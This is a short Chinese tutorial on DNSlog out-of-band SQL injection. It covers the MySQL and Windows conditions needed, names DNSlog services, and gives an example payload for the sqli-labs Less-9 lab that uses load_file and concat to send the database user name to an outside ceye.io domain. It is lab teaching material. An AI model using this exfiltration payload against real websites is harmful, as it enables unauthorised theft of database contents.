WEB安全--SQL注入--DNSlog外带

一、原理:

访问域名时,dns协议将我们访问的语句解析为ip地址,并将其记录在其日志中;在这个过程中,如果我们在语句中写入SQL注入的语句,那么在dns解析时会执行这些语句并通过concat将结果和域名一起记录在日志中,这时我们就能直接去日志中查看敏感信息。

二、条件:

1.mysql的my.ini文件中的secure_file_priv参数值要为空, secure_file_priv=""

2.用户的权限必须是root

3.网站是windows服务器,因为load_file()基于UNC格式读取,是windows系统特有的

三、网站:

DNSLog Platform

CEYE - Monitor service for security testing

登录 - DNSlog System

DNSLOG Platform

DNSLog Platform -- DNSLog

四、示例:

以sqli-labs第9关为例:

sql 复制代码
http://127.0.0.1/sqli-labs-master/Less-9/
?id=1' and (select load_file(concat('\\\\',(select hex(user())),'
.s5vuxg.ceye.io\\abc')))--+

因为一些字符不能直接回显在网页上,需要hex()转为十六进制

最后再转回来即可

相关推荐
施嘉伟1 天前
SQL Server安全配置全面检查与优化方案
数据库·安全
Andya_net1 天前
网络安全 | SSL/TLS 证书文件格式详解:PEM、CRT、CER、DER、PKI、PKCS12
安全·web安全·ssl
newxtc1 天前
【昆明市不动产登记中心-注册安全分析报告】
人工智能·安全
jieyu11191 天前
uploads-labs靶场通关(1)
web安全·文件上传漏洞·靶场通关
忧郁的橙子.1 天前
十六、kubernetes 1.29 之 集群安全机制
安全·容器·kubernetes
竹等寒1 天前
Linux-网络安全私房菜(二)
linux·服务器·web安全
雪兽软件1 天前
SaaS 安全是什么以及如何管理风险
网络·安全
white-persist1 天前
CSRF 漏洞全解析:从原理到实战
网络·python·安全·web安全·网络安全·系统安全·csrf
samroom1 天前
iframe实战:跨域通信与安全隔离
前端·安全
渗透测试老鸟-九青1 天前
网络安全之揭秘APT Discord C2 以及如何取证
安全·web安全·网络安全学习路线